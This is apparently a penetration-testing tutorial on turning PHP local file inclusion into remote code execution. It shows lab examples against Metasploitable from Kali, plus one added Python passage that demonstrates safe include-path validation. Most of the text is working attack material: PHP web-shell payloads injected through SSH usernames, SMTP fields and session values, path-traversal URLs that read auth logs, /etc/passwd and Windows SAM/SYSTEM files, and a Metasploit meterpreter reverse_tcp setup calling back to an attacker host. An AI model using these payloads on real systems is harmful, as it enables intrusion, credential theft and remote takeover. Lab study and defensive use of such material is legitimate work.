RCE with log poisoning Attack Methodologies


Some of the log files commonly targeted for inclusion are the following:

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/auth 
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log

When a web server suffers from local file inclusion (LFI), it is worth knowing a reliable method to exploit it. Let's assume we are working on a Metasploitable 2 target and that the attacking machine runs Kali Linux.

The following steps explain how one can perform this process on Kali Linux:

Open a terminal on Kali Linux and connect to the target over SSH. The following command does this:

 ssh msfadmin@192.168.1.105

Check the permissions of the auth.log file beforehand using the following command:

ls -l /var/log/auth.log

Most of the time the auth.log file is readable by other users (read-write for its owner). The listing should look like the following:

-rw-r--r-- syslog adm ...

We can now access the file and read its log entries with the following command:

tail -f /var/log/auth.log

We can walk through the logs and check the specific entries for the user named "msfadmin".

Now, let's attempt to connect to the target over SSH using a counterfeit username. The following command produces an invalid login:

ssh dadp@192.168.1.105

Permission should now be denied, with the message shown as follows:

"Permission denied, please try again."

Then go back to the auth.log file and check whether this fake login attempt has been recorded. It should show that an invalid user tried to get access. If the attacking machine used the IP address 192.168.1.104, a line like the following should appear:

"Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"

This means that every login, whether successful or invalid, is recorded in the logs. Let's now try passing PHP code as the invalid username and see how the server reacts. The following command makes an SSH login attempt with a PHP snippet as the username:

ssh '<?php system($_GET['c']); ?>'@192.168.1.105

Then go back to the auth.log file again and check whether this attempt has been recorded. If the attacking machine used the IP address 192.168.1.104, a line like the following should appear:

"Failed Password for invalid user <?php system($_GET['c']); ?> from 192.168.1.104 port 49642 ssh2"

Let's assume that you have previously set up an LFI-vulnerable page and now browse to it using the following link:

192.168.1.105/lfi/lfi.php

An error will appear that indicates a local file inclusion vulnerability.

The auth.log file can now be included by passing its path as the parameter in the following URL:

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

Note that a warning will display, with the following text:

“Warning cannot execute a blank command or log entry contains the ssh username with <?php system($_GET[‘c’]); ?> with ssh failed etc.”

Let's discuss what this actually means. The PHP code injected into the log earlier, which runs whatever command is passed in the c parameter, has now been included and executed by the web server. Any command can therefore be sent through that parameter.

Let's now browse to

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps

This will dump the contents of auth.log and also execute the command given through the c parameter.

Let's now browse to 192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=pwd.

The command output is displayed in the browser window in the same way.

Log Poisoning via Mail

As the logs tell us, the server is running Postfix and has port 25 (SMTP) open, which was found with a basic Nmap scan. Our goal now is to inject PHP into the mail log so that it executes when the page with the LFI vulnerability is refreshed. Sending the phpinfo syntax is a good initial test, but our end goal is to send this:

<?php echo system($_GET["cmd"]); ?>

So how can we get this PHP string into the Postfix mail.log? By default, Postfix logs dates, email addresses and some other basic data. Use a mail client such as mutt, or telnet, to send mail to the victim server. Using smtp-user-enum on Kali may also be a wise option to check for valid users, as long as VRFY isn't disabled in the Postfix configuration.

If you were thorough, you’ll notice the mail log includes the text of the mail subject. This is just perfect – now we can have PHP process any arbitrary code we mail it.

SMTP command flow via telnet may look something like this.

telnet 192.168.1.107 25

Now let's send a mail from the command line (CLI) of this machine and pass the PHP wrapper for OS commands through the "RCPT TO" field. The mail.log file records an entry for every delivery attempt made against the server, so the PHP code sent as a fake recipient is appended automatically to mail.log as a new entry.

MAIL FROM:<jaimatadi@gmail.com>
RCPT TO:<?php system($_GET['c']); ?> 

Our goal is to inject PHP code into the logs; this stage is called log file poisoning. The included mail.log content is displayed along with the output of the command passed through the c parameter. Now pass ifconfig as the command to list the network interfaces and confirm the result in the browser:

192.168.1.107/xyz/lfi.php?file=/var/log/mail.log&c=ifconfig

In some cases, you can also send the email with the mail command line.

mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10 < /dev/null

LFI to RCE via PHP sessions

Check if the website uses PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

In PHP these sessions are stored in /var/lib/php5/sess_[PHPSESSID] files:

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Set a value that is stored in the session (here the user field) to <?php system('cat /etc/passwd');?>:

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Use the LFI to include the PHP session file:

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
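Both includes shown on this page, ?file=/var/log/auth.log in the log-poisoning section and the lang=/../../.. traversal into the session directory above, succeed because the script hands the raw parameter to include(). The following Python is an added example, not code from the page or from any real application, that models that vulnerable path construction beside a confined version: the requested page name is resolved against a fixed directory and refused if it is absolute, uses a stream wrapper, escapes the directory after normalisation, or lacks an allowed extension. The root directory, the extension list and the request values are assumptions chosen for illustration.

```python
import posixpath
from typing import Optional

# Assumed application layout (illustrative, not from the page): every includable
# page lives under this directory and ends in .php.
INCLUDE_ROOT = "/var/www/app/pages"
ALLOWED_SUFFIXES = (".php",)


def unsafe_include_path(requested: str, root: str = INCLUDE_ROOT) -> str:
    """Models include($_GET['file']): an absolute value is opened as-is and a
    relative one is resolved from the page directory, '..' and all.
    posixpath.join discards the root when the second argument is absolute."""
    return posixpath.join(root, requested)


def safe_include_path(requested: str, root: str = INCLUDE_ROOT) -> Optional[str]:
    """Return the absolute path to include, or None if the request must be refused."""
    if not requested or "\x00" in requested:
        return None            # empty or NUL-truncated names are never valid
    if posixpath.isabs(requested):
        return None            # '/var/log/auth.log' style requests stop here
    if "://" in requested:
        return None            # php://, data://, expect:// wrappers are not files
    candidate = posixpath.normpath(posixpath.join(root, requested))
    # After collapsing '..', the result must still lie inside the root directory.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None            # session files, logs and uploads are not pages
    return candidate


if __name__ == "__main__":
    # Request values taken from the page's own examples plus a benign one.
    for value in ("en_us.php",
                  "/var/log/auth.log",
                  "/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27",
                  "../../../../var/lib/php5/sess_x"):
        print(f"{value!r}: unsafe -> {unsafe_include_path(value)!r}, "
              f"safe -> {safe_include_path(value)!r}")
```

The normalisation step matters: a naive check that only rejects a leading "/" still lets the relative traversal in the last sample value reach the session directory. Where the set of pages is small, a fixed mapping from a short name to a file (for example "en_us" to en_us.php) is stricter still, because the request then never contains a path at all.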

LFI to RCE via phpinfo()

phpinfo() displays the content of variables such as $_GET, $_POST and $_FILES.

By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.

Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)

Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

LFI to RCE via credentials files

This method requires high privileges inside the application in order to read the sensitive files.

Windows version

First extract the SAM and SYSTEM files.

http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system

Then extract the hashes from these files (samdump2 SYSTEM SAM > hashes.txt) and crack them with hashcat or john, or replay them using the Pass-the-Hash technique.

Execute the following commands inside Metasploit:

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set lport 8888
msf exploit(web_delivery) > exploit
